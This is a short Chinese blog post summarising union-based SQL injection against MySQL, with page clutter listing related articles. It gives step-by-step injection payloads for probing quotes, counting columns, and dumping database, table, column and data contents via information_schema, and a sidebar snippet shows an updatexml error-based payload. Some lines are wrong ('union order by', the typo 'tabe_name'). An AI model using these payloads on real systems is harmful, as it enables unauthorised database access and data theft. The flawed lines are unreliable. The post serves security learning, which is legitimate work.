简单的联合SQL注入总结

最新推荐文章于 2024-09-02 07:02:10 发布
最新推荐文章于 2024-09-02 07:02:10 发布
阅读量58 收藏
点赞数
文章标签: sql 数据库 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51763493/article/details/132788260
版权

(1)先输入1 '  判断是什么类型的注入,若是整形,一般会报这种错:Error Code: 1064. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’’ at line 1 0.000 sec;

若是字符型,一般会报这种错:Error Code: 1064. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ‘‘1’’’ at line 1 0.016 sec


(2)确定表中的列

1’ and 1=2 union order by xxx #(一直加,直到报错)

(3)确定数据库名(这里以三列为例)

1' and 1=2 union select 1, 2, database() #

  (4) 确定表名
1’ and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() #

  (5)确定列名

1' and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where tabe_name='你想查的表' #

  (6)获取数据

1' and 1=2 union select xxx,xxx from 表 #

_(什么都不会)
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
从零开始的sqli-lab(1-21)
qq_51248658的博客
01-13 1099
第一页完结
SQL联合注入
黑黑的小鸭的博客
08-09 2226
超详细介绍SQL联合注入,本文使用靶场为sqli-labs less-1;
SQL 注入漏洞(五)union 联合注入
不秃头的程序Yang
06-11 2013
1、联合查询的错误方式 4、联合查询注入获取敏感信息 6、通过 information_schema 获取表
SQL注入---联合注入
qq_41592307的博客
09-03 253
Union联合注入攻击 1、联合注入的思路(会显示输出内容时,才考虑使用Union注入) (可以在输入框中或者URL中输入内容,如果不能在输入框内输入内容,则需要使用Burp suite使用 重发器,修改id中的内容进行爆破数据) 判断是否存在SQL注入点(判断注入的类型) 使用 order by 1-99 语句来检测数据表的字段数量 1.字符型 2.整数型 判断输出的位置,通过联合查询,union select 字段数 ...
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法...
sql注入获取mysql版本信息_这可能是最全的SQL注入总结,很有用
weixin_28936857的博客
02-22 2460
SQL注入原理当客户端提交的数据未作处理或转义直接带入数据库,就造成了sql注入。攻击者通过构造不同的sql语句来实现对数据库的任意操作。SQL注入的分类按变量类型分:数字型和字符型按HTTP提交方式分:POST注入、GET注入和Cookie注入按注入方式分:布尔注入、联合注入、多语句注入、报错注入、延时注入、内联注入按数据库类型分:sql:oracle、MySQL、mssql、access、sq...
SQL注入之如何检测与判断详细过程
01-31
随着网络安全意识的提高和技术的发展,传统的SQL注入检测方法(如简单的字符串匹配)已经不再有效。因此,本文档将详细介绍一种更高级别的SQL注入检测方法。 #### 二、检测流程详解 ##### A. 判断注入 - **%5c**:...
SQL注入技巧2-常用技巧总结(攻击向量)
10-11
### SQL注入技巧2-常用技巧总结(攻击向量) #### 概述 SQL注入是一种常见的Web应用程序漏洞,攻击者可以通过这种手段将恶意SQL代码插入到应用程序的查询语句中,从而控制数据库执行非授权操作。本文档总结了作者...
SQL注入总结
ad12456的博客
03-27 1959
SQL注入
MySQL数据库增删查改(基础)CRUD
最新发布
chendemingxxx的博客
09-02 550
比如说:创建一张学生表,有姓名,学号。插入两个学生。可能有点草率看看例子: 顺序不是问题,后面参数和前面括号参数对等就行。比如说上面的例子:把id和name参数倒过来了,后面参数一一对应也可以。不推荐使用全列查询原因:比如说上面例子我只要id或者说只要name;当然也可以查询多个列: 比如说我们创建一个这样的表命令:第一个 效果:第三个总分效果:拓展一个现象: 拓展:语法:比较运算符:逻辑运算符:解释:%在mysql这里代表的是多个任意字符,_代表的是 一个任意字符。揭晓来才是修改硬盘里面的内容。案例:
PostgreSQL遍历所有的表并为其创建基于某个字段的索引
致力于互联网、物联网领域知识内容分享
08-29 562
以下以"collect_time"字段为例,其他字段请自行全局替换。
sql-labs51-55通关攻略
m0_75036923的博客
08-30 806
1'and updatexml(1,concat(0x7e,(select database()),0x7e),1)--+' and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),0x7e),1) --+' and updatexml(1,concat(0x7e,(select group_concat(column
一步迅速了解Spring框架
ymr1843762281的博客
08-28 534
将程序中的一些公共的非业务代码分离提取出来,然后在业务代码执行的时候,给他们横切进来,使用的动态代理的机制实现,在我们的业务代码,不显示调用,但是执行业务代码,会通过代理对象,调用非业务代码。以前我们在程序中需要对象,都是自己new,例如:new StudentDao对象,Spring 是一个轻量级的,IOC 和 AOP 的一站式 Java 开发框架,是为了简化企。除了核心的IOC和AOP功能之外,还对数据访问层,web层都有封装,所以是一站式的。inversion of Control 控制反转。
在Postgresql中计算工单的对应的GPS轨迹距离
专注GIS软件开发。
08-30 717
在某个App开发中,要求记录用户的日常轨迹,在用户巡逻设备的时,将记录的轨迹点当做该设备巡逻时候的轨迹。由于业务逻辑上没有明确的指示人员巡逻工单-GPS位置之间的关系,所以通过时间关系进行轨迹划定。
【解决】sql中包含问号(?),导致mybatis解析错误
奔跑的菜鸟的Run博客
08-30 357
被替换了 而不是 我们参数 ,参数的位置还是空的。下面给出两种我测试都可以的方案,但是个人比较推荐第二种方案。这个sql在我们的sql连接器中执行是完全没问题的,但是在mybatis中使用这个sql的时候。也就是在问号的前面多加一个问号,这样就能解决了。会被mybatis当作占位符 替换成参数。给解析成变量 导致sql查询失败。解析参数会把 sql语句中的。sql语句中本身包含。使用pg数据库内置函数。
PostgreSQL技术内幕6:PostgreSQL索引技术
qq_40529346的博客
09-01 1910
本文主要介绍PG的索引技术,包含PG支持的索引类型,语法,查看方式,以及其中B-Tree索引的原理解析和源码解读。
SQL【1】基础语法
m0_68339197的博客
09-01 363
值的格式:外有括号,里面用逗号隔开,不一定是整整一行。列名='值' 表示要该项为该值。默认是升序的,当然扩充下词汇量。引号:文本,无需引号:数值。加了distinct后。
sql-labs41-45关通关攻略
m0_75036923的博客
08-28 900
第43关第44关第45关。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值